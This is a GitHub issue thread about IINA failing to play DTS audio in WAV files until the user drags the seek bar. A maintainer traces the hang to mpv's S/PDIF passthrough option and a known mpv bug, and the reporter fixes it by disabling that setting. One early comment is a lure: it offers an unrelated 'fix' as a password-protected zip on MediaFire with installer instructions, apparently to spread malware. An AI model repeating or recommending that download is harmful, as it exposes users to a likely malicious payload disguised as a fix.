### ISSUE TITLE
Can't play DTS-WAV file normally unless drag the thumb

### ISSUE THREAD

**Issue by AngryAndroid** [iina/iina#5161]
**System and IINA version:**
- macOS Big Sur 11.6
- IINA 1.3.5 Build 141

**Expected behavior:**
Play normally.

**Actual behavior:**
When I double-click the local file to open IINA, it starts playing but gets stuck at once. Duration shows and the Play Button change to Pause state, but no audio comes out and the thumb keeps still. Once I drag the thumb, everything suddenly goes well until the music comes to an end. By then it automatically starts to play the next file in the same format, and gets stuck again.

**mpv log:**
None.

**Steps to reproduce:**
As above. BTW, file extension: wav, audio format: spdif-dts, audio codec: dca. Also sees the attachment.
[sample.zip](https://github.com/user-attachments/files/16791261/sample.zip)

- [x] MPV does not have this problem.

**How often does this happen?**
Always.

**Comment by africanobyamugisha** [comment]
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by low-batt** [comment]
For audio/video playback and subtitle rendering support IINA is using a library from the [mpv](https://github.com/mpv-player/mpv) project. Audio is fully handled by `libmpv`. IINA merely configures mpv's audio features.

To reproduce the problem I changed IINA's audio configuration and enabled `DTS` in the `S/PDIF output` setting as seen here:
![settings](https://github.com/user-attachments/assets/226509e7-bde0-454e-b673-ed28b404579a)

Enabling that setting causes IINA to set the mpv [audio-spdif](https://mpv.io/manual/stable/#options-audio-spdif) option to `DTS`:
> **--audio-spdif=\<codecs>**
>    List of codecs for which compressed audio passthrough should be used. This works for both classic S/PDIF and HDMI.
>
>    Possible codecs are ac3, dts, dts-hd, eac3, truehd. Multiple codecs can be specified by separating them with ,. dts refers to low bitrate DTS core, while dts-hd refers to DTS MA (receiver and OS support varies). If both dts and dts-hd are specified, it behaves equivalent to specifying dts-hd only.
>
>    In earlier mpv versions you could use --ad to force the spdif wrapper. This does not work anymore.
>
>    Warning
>
>    There is not much reason to use this. HDMI supports uncompressed multichannel PCM, and mpv supports lossless DTS-HD decoding via FFmpeg's new DCA decoder (based on libdcadec).

With that setting enabled the mpv log file shows this failure:
```text
[   0.223][v][ao] Trying audio driver 'coreaudio'
[   0.223][v][ao/coreaudio] requested format: 48000 Hz, stereo channels, spdif-dts
[   0.223][v][ao/coreaudio] redirecting to coreaudio_exclusive
[   0.223][v][ao/coreaudio_exclusive] requested format: 48000 Hz, stereo channels, spdif-dts
[   0.223][v][ao/coreaudio_exclusive] selected audio output device: LG UltraFine Display Audio (83)
[   0.224][v][ao/coreaudio_exclusive] -  48000.0Hz 24bit mcpl [12][6bpp][1fbp][6bpf][2ch] int LE S packed (-)
[   0.224][v][ao/coreaudio_exclusive] -  48000.0Hz 24bit mcpl [76][6bpp][1fbp][6bpf][2ch] int LE S packed (-)
[   0.224][e][ao/coreaudio_exclusive] No useable substream found.
[   0.225][e][ao] Failed to initialize audio driver 'coreaudio'
[   0.225][v][cplayer] Falling back to PCM output.
```

Because `--audio-spdif=dts` was specified mpv expected to find something other than a 2 channel audio device and fell back to PCM output. It should have then continued to play. I reproduced this same behavior using the [mpv player](https://mpv.io/).

I believe this is the problem described in mpv issue https://github.com/mpv-player/mpv/issues/8403. From that issue:
> **Expected behavior**
> It is expected that the file plays.
> It is expected that audio-spdif have no effect because it detects that the device is not S/PDIF.
>
> **Actual behavior**
> It remains **stuck at 00:00:00.000**. You can have it unstuck by simply seeking forward. After that, playing continues smoothly.

Does this seem like the problem you are encountering?

**Comment by AngryAndroid** [comment]
Yep, absolutely right!

**Comment by AngryAndroid** [comment]
But it plays smoothly by using mpv player without any bugs encountered.

**Comment by low-batt** [comment]
Are you specifying `--audio-spdif=dts` when running mpv?
```bash
low-batt@gag ~$ mpv --ao=coreaudio --audio-spdif=dts Documents/builds/iina-official/issue-5161/sample.wav 
 (+) Audio --aid=1 (dts 7ch 44100Hz)
[ao/coreaudio_exclusive] No useable substream found.
[ao] Failed to initialize audio driver 'coreaudio'
```

**Comment by AngryAndroid** [comment]
Nope. I installed mpv just for the first time for test without settings being modified.
Downloaded from: https://laboratory.stolendata.net/~djinn/mpv_osx/mpv-0.37.0.tar.gz

**Comment by low-batt** [comment]
Running mpv without that option is the same as if in IINA you uncheck all of the  `S/PDIF output` settings. Playback won't hang.

To run mpv in [Terminal](https://support.apple.com/guide/terminal/welcome/mac) using the stolendata build you can specify the full pathname to the binary executable like so:
```bash
/Applications/mpv.app/Contents/MacOS/mpv --ao=coreaudio --audio-spdif=dts Documents/builds/iina-official/issue-5161/sample.wav
```

Do you need to set the `S/PDIF output` settings? The mpv documentation seems to indicate it should not be needed:
>    There is not much reason to use this. HDMI supports uncompressed multichannel PCM, and mpv supports lossless DTS-HD decoding via FFmpeg's new DCA decoder (based on libdcadec).

**Comment by AngryAndroid** [comment]
No, I don't need that. Thanks for your solution with heart and patience, it works! Thank you!

**Comment by low-batt** [comment]
Glad to hear it is working for you.

I'm going to leave this issue open as a reminder of the mpv defect. Hopefully mpv will eventually fix the problem.

I forgot to thank you at the start for an excellent problem report. You provided all the information needed for me to investigate. Sorry about the problem. Thanks for taking the time to report it.
